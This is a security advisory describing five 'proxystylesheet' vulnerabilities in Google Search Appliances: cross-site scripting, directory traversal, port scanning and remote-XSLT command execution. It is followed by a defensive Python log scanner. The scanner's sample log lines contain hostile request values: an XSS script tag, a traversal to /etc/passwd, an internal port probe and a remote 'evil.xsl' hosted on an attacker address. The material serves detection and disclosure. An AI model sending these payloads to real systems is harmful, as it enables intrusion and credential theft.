J-Security Center

Title: Google Search Appliance ProxyStyleSheet Multiple Remote Vulnerabilities

Severity: HIGH

Description:
Google Search Appliances are commercial search devices produced by Google.

The Google Search Appliance 'proxystylesheet' feature is susceptible to multiple remote vulnerabilities. These issues stem from the devices failing to securely handle user-specified XSLT style sheets when rendering search results.

Google Search Appliances read an HTTP request parameter called 'proxystylesheet' to determine the location of an XSLT (Extensible Stylesheet Language Transformations) file, which is used to alter how search results are displayed. Several issues in the handling of this parameter have been identified.

The first issue is a cross-site scripting vulnerability. The contents of the 'proxystylesheet' request parameter are reflected back to users without sanitization, allowing attackers to craft URIs that include malicious script code. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

The second issue is an information-disclosure vulnerability. By specifying as the argument to 'proxystylesheet' arbitrary filenames that include '../' directory-traversal sequences, attackers may determine the existence of arbitrary files on the targeted computer. This may aid them in further attacks.

The third issue is also an information-disclosure vulnerability. By specifying remote URIs that include port specifications, attackers may use the affected device as a port scanner against networks reachable from the device, because the device returns different data to the user depending on the status of the remote TCP port. This may aid attackers in further attacks.

The fourth issue is a cross-site scripting vulnerability. Malicious users may specify the URI of an attacker-controlled XSLT style sheet containing malicious script code that will be executed by the targeted user's browser. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

The fifth issue is an arbitrary command-execution vulnerability. Malicious users may specify the URI of an attacker-controlled XSLT style sheet containing malicious commands that will be executed as an unprivileged user on the affected appliance. This allows attackers to compromise the affected device.

The Google Mini Search Appliance is confirmed vulnerable to these issues. The Google Search Appliance may also be affected.
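From the detection side, the following Python script (an added example, not part of the advisory or of Google's product) scans web access logs for requests whose 'proxystylesheet' value matches the issue classes described above. The log lines are constructed, and the /search path and combined-log format are assumptions about how such requests would appear.

```python
"""Flag abuse of the Google Search Appliance 'proxystylesheet' parameter in access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined-log style (not taken from the advisory).
# The /search path is an assumption about where the appliance reads the parameter.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /search?q=payroll&proxystylesheet=default_frontend HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2023:13:55:07 +0000] "GET /search?q=x&proxystylesheet=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 812
203.0.113.9 - - [10/Oct/2023:13:55:12 +0000] "GET /search?q=x&proxystylesheet=../../../../etc/passwd HTTP/1.1" 500 311
203.0.113.9 - - [10/Oct/2023:13:55:20 +0000] "GET /search?q=x&proxystylesheet=http://10.0.0.5:22/x.xsl HTTP/1.1" 500 297
203.0.113.9 - - [10/Oct/2023:13:55:31 +0000] "GET /search?q=x&proxystylesheet=http://203.0.113.9/evil.xsl HTTP/1.1" 200 640
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_value(value):
    """Map one decoded proxystylesheet value to the advisory's issue classes."""
    findings = []
    v = unquote(value)  # second decode catches double-encoded sequences such as %252e%252e/
    if re.search(r'[<>]|javascript:', v, re.IGNORECASE):
        findings.append('reflected-xss')           # issue 1: value reflected into the page
    if '../' in v or '..\\' in v:
        findings.append('directory-traversal')     # issue 2: probing local files
    parts = urlsplit(v)
    if parts.scheme in ('http', 'https', 'ftp'):
        findings.append('remote-stylesheet')       # issues 4 and 5: attacker-hosted XSLT
        try:
            if parts.port is not None:
                findings.append('port-probe')      # issue 3: explicit port in the URI
        except ValueError:                         # malformed port such as ':abc'
            findings.append('port-probe')
    return findings

def scan_log(text):
    """Return (client ip, raw value, findings) for each request with a suspicious proxystylesheet."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m['target']).query
        for value in parse_qs(query, keep_blank_values=True).get('proxystylesheet', []):
            findings = classify_value(value)
            if findings:
                hits.append((m['ip'], value, findings))
    return hits

if __name__ == '__main__':
    for ip, value, findings in scan_log(SAMPLE_LOG):
        print(f'{ip} {findings} {value}')
```

A benign configured style sheet name such as the constructed `default_frontend` produces no finding, so the script can be pointed at a full day's log with little noise; an allowlist of known style sheet names is the corresponding preventive control.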

Affected Products:

  • Google Mini Search Appliance
  • Google Search Appliance
